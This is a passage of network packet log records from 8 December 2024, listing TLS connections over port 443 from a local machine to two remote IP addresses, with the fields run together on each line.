                                                                          Dec 8, 2024 20:50:41.959284067 CET44349772104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.969345093 CET44349772104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.969399929 CET49772443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:41.969407082 CET44349772104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.974890947 CET44349772104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.974951982 CET49772443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:41.974956036 CET44349772104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.990349054 CET44349772104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.990415096 CET49772443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:41.990420103 CET44349772104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.998358965 CET44349772104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:41.998414040 CET49772443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:41.998419046 CET44349772104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:42.006232977 CET44349772104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:42.006284952 CET49772443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:42.006289959 CET44349772104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:42.057356119 CET49772443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:42.057362080 CET44349772104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:42.103538036 CET49772443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:42.129400015 CET44349772104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:42.153110027 CET44349772104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:42.153171062 CET49772443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:42.153177023 CET44349772104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:42.161187887 CET44349772104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:42.161237955 CET49772443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:42.161242962 CET44349772104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:42.169217110 CET44349772104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:42.169271946 CET49772443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:42.169276953 CET44349772104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:42.176961899 CET44349772104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:42.177010059 CET49772443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:42.177016020 CET44349772104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:42.193099976 CET44349772104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:42.193110943 CET44349772104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:42.193166971 CET49772443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:42.193172932 CET44349772104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:42.207823992 CET44349772104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:42.207850933 CET44349772104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:42.207885027 CET49772443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:42.207890987 CET44349772104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:42.207912922 CET49772443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:42.221781969 CET44349772104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:42.221853971 CET49772443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:42.221858978 CET44349772104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:42.221898079 CET49772443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:42.234642029 CET44349772104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:42.234648943 CET44349772104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:42.234709978 CET49772443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:42.234755039 CET44349772104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:42.234793901 CET49772443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:42.234796047 CET44349772104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:42.234839916 CET49772443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:42.235037088 CET49772443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:42.235047102 CET44349772104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:42.502827883 CET49775443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:42.502866030 CET44349775104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:42.502929926 CET49775443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:42.503329039 CET49775443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:42.503341913 CET44349775104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:43.889103889 CET44349775104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:43.889358044 CET49775443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:43.889384031 CET44349775104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:43.889719009 CET44349775104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:43.890041113 CET49775443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:43.890111923 CET44349775104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:43.890189886 CET49775443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:43.890221119 CET49775443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:43.890268087 CET44349775104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:44.352291107 CET44349775104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:44.352343082 CET44349775104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:44.352375984 CET44349775104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:44.352397919 CET49775443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:44.352415085 CET44349775104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:44.352454901 CET49775443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:44.471211910 CET44349775104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:44.471329927 CET44349775104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:44.471364975 CET44349775104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:44.471398115 CET44349775104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:44.471400976 CET49775443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:44.471410990 CET44349775104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:44.471436977 CET49775443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:44.471489906 CET44349775104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:44.471525908 CET44349775104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:44.471532106 CET49775443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:44.471539974 CET44349775104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:44.471579075 CET49775443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:44.544011116 CET44349775104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:44.562880993 CET44349775104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:44.562947989 CET49775443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:44.562957048 CET44349775104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:44.582983017 CET44349775104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:44.583056927 CET49775443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:44.583065033 CET44349775104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:44.613452911 CET44349775104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:44.613506079 CET49775443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:44.613513947 CET44349775104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:44.617209911 CET44349775104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:44.617257118 CET49775443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:44.617264032 CET44349775104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:44.625102997 CET44349775104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:44.625155926 CET49775443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:44.625161886 CET44349775104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:44.632384062 CET44349775104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:44.632457972 CET49775443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:44.632463932 CET44349775104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:44.647460938 CET44349775104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:44.647522926 CET49775443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:44.647532940 CET44349775104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:44.655195951 CET44349775104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:44.655252934 CET49775443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:44.655257940 CET44349775104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:44.662733078 CET44349775104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:44.662782907 CET49775443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:44.662790060 CET44349775104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:44.666734934 CET44349775104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:44.666781902 CET49775443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:44.666786909 CET44349775104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:44.718619108 CET49775443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:44.718626022 CET44349775104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:44.721434116 CET44349775104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:44.721483946 CET49775443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:44.721492052 CET44349775104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:44.738192081 CET44349775104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:44.738245964 CET49775443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:44.738254070 CET44349775104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:44.745769024 CET44349775104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:44.745831013 CET49775443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:44.745837927 CET44349775104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:44.751912117 CET44349775104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:44.751975060 CET49775443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:44.751981974 CET44349775104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:44.767148018 CET44349775104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:44.767215014 CET49775443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:44.767220974 CET44349775104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:44.767262936 CET49775443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:44.782371044 CET44349775104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:44.782378912 CET44349775104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:44.782433033 CET49775443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:44.782504082 CET44349775104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:44.782553911 CET49775443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:44.797768116 CET44349775104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:44.797775984 CET44349775104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:44.797831059 CET49775443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:44.812916040 CET44349775104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:44.812922955 CET44349775104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:44.812983036 CET49775443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:44.819762945 CET44349775104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:44.819822073 CET49775443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:44.833018064 CET44349775104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:44.833082914 CET49775443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:44.833089113 CET44349775104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:44.833105087 CET44349775104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:44.833157063 CET49775443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:44.833255053 CET49775443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:44.833266973 CET44349775104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:44.836893082 CET49776443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:44.836925983 CET44349776104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:44.836994886 CET49776443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:44.837234974 CET49776443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:44.837250948 CET44349776104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:44.982747078 CET49777443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:44.982777119 CET44349777104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:44.982901096 CET49777443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:44.983068943 CET49777443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:44.983083963 CET44349777104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:46.060868025 CET44349776104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:46.061166048 CET49776443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:46.061188936 CET44349776104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:46.061517000 CET44349776104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:46.061830997 CET49776443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:46.061889887 CET44349776104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:46.061954975 CET49776443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:46.103331089 CET44349776104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:46.198785067 CET44349777104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:46.199007988 CET49777443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:46.199031115 CET44349777104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:46.199372053 CET44349777104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:46.199678898 CET49777443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:46.199743032 CET44349777104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:46.199800014 CET49777443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:46.243340015 CET44349777104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:46.505897999 CET44349776104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:46.506362915 CET44349776104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:46.506427050 CET49776443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:46.506597996 CET49776443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:46.506613016 CET44349776104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:46.656451941 CET44349777104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:46.656567097 CET44349777104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:46.656621933 CET49777443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:46.656644106 CET44349777104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:46.656656027 CET44349777104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:46.656692028 CET49777443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:46.657818079 CET49777443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:46.657830000 CET44349777104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:46.661428928 CET49778443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:46.661465883 CET44349778104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:46.661525965 CET49778443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:46.661854029 CET49778443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:46.661866903 CET44349778104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:47.880708933 CET44349778104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:47.880959034 CET49778443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:47.880981922 CET44349778104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:47.881299019 CET44349778104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:47.881738901 CET49778443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:47.881807089 CET44349778104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:47.881901026 CET49778443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:47.923332930 CET44349778104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:48.342052937 CET44349778104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:48.342127085 CET44349778104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:48.342189074 CET49778443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:48.385210037 CET49778443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:48.385252953 CET44349778104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:48.422442913 CET49779443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:48.422482967 CET44349779104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:48.422554016 CET49779443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:48.422770023 CET49779443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:48.422784090 CET44349779104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:48.551799059 CET49780443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:48.551830053 CET44349780104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:48.551918983 CET49780443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:48.552201986 CET49780443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:48.552213907 CET44349780104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:49.639275074 CET44349779104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:49.639558077 CET49779443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:49.639585972 CET44349779104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:49.639919043 CET44349779104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:49.640243053 CET49779443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:49.640307903 CET44349779104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:49.640352011 CET49779443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:49.683335066 CET44349779104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:49.693939924 CET49779443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:49.765976906 CET44349780104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:49.767477036 CET49780443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:49.767501116 CET44349780104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:49.767884970 CET44349780104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:49.775330067 CET49780443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:49.775428057 CET44349780104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:49.775520086 CET49780443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:49.775612116 CET49780443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:49.775644064 CET44349780104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:49.775748968 CET49780443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:49.775762081 CET44349780104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:50.091778994 CET44349779104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:50.091860056 CET44349779104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:50.091936111 CET49779443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:50.092890978 CET49779443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:50.092902899 CET44349779104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:50.478235960 CET44349780104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:50.478286028 CET44349780104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:50.478318930 CET44349780104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:50.478348017 CET44349780104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:50.478362083 CET49780443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:50.478389978 CET44349780104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:50.478404045 CET49780443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:50.480825901 CET44349780104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:50.480887890 CET49780443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:50.480895996 CET44349780104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:50.489198923 CET44349780104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:50.489260912 CET49780443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:50.489268064 CET44349780104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:50.498514891 CET44349780104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:50.498573065 CET49780443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:50.498579979 CET44349780104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:50.542372942 CET49780443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:50.597470999 CET44349780104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:50.640429974 CET49780443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:50.670149088 CET44349780104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:50.673880100 CET44349780104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:50.673927069 CET49780443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:50.673937082 CET44349780104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:50.684319019 CET44349780104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:50.684366941 CET49780443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:50.684374094 CET44349780104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:50.685091019 CET44349780104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:50.685141087 CET49780443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:50.685405016 CET49780443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:50.685414076 CET44349780104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:50.711179018 CET49781443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:50.711206913 CET44349781104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:50.711271048 CET49781443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:50.711477995 CET49781443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:50.711491108 CET44349781104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:51.978471041 CET44349781104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:51.978818893 CET49781443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:51.978836060 CET44349781104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:51.979156017 CET44349781104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:51.979496002 CET49781443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:51.979558945 CET44349781104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:51.979614019 CET49781443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:52.023338079 CET44349781104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:52.027293921 CET49781443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:52.422600031 CET44349781104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:52.422677040 CET44349781104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:50:52.422735929 CET49781443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:52.423232079 CET49781443192.168.2.4104.18.95.41
                                                                          Dec 8, 2024 20:50:52.423243999 CET44349781104.18.95.41192.168.2.4
                                                                          Dec 8, 2024 20:51:00.456549883 CET49782443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:00.456574917 CET4434978220.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:00.456648111 CET49782443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:00.456851006 CET49782443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:00.456864119 CET4434978220.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:02.233403921 CET4434978220.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:02.233572006 CET49782443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:02.250437975 CET49782443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:02.250453949 CET4434978220.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:02.250835896 CET4434978220.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:02.251653910 CET49782443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:02.251653910 CET49782443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:02.251677036 CET49782443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:02.251693010 CET4434978220.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:02.892863989 CET4434978220.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:02.892940044 CET4434978220.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:02.893235922 CET49782443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:02.893268108 CET49782443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:02.893268108 CET49782443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:02.893280983 CET4434978220.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:02.893290043 CET4434978220.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:02.899919033 CET49783443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:02.899954081 CET4434978320.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:02.900098085 CET49783443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:02.900239944 CET49783443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:02.900254011 CET4434978320.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:02.920038939 CET49784443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:02.920067072 CET4434978420.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:02.920169115 CET49784443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:02.920322895 CET49784443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:02.920331955 CET4434978420.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:04.672925949 CET4434978320.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:04.673429966 CET49783443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:04.673448086 CET4434978320.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:04.673986912 CET49783443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:04.673990965 CET4434978320.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:04.674019098 CET49783443192.168.2.420.190.147.8
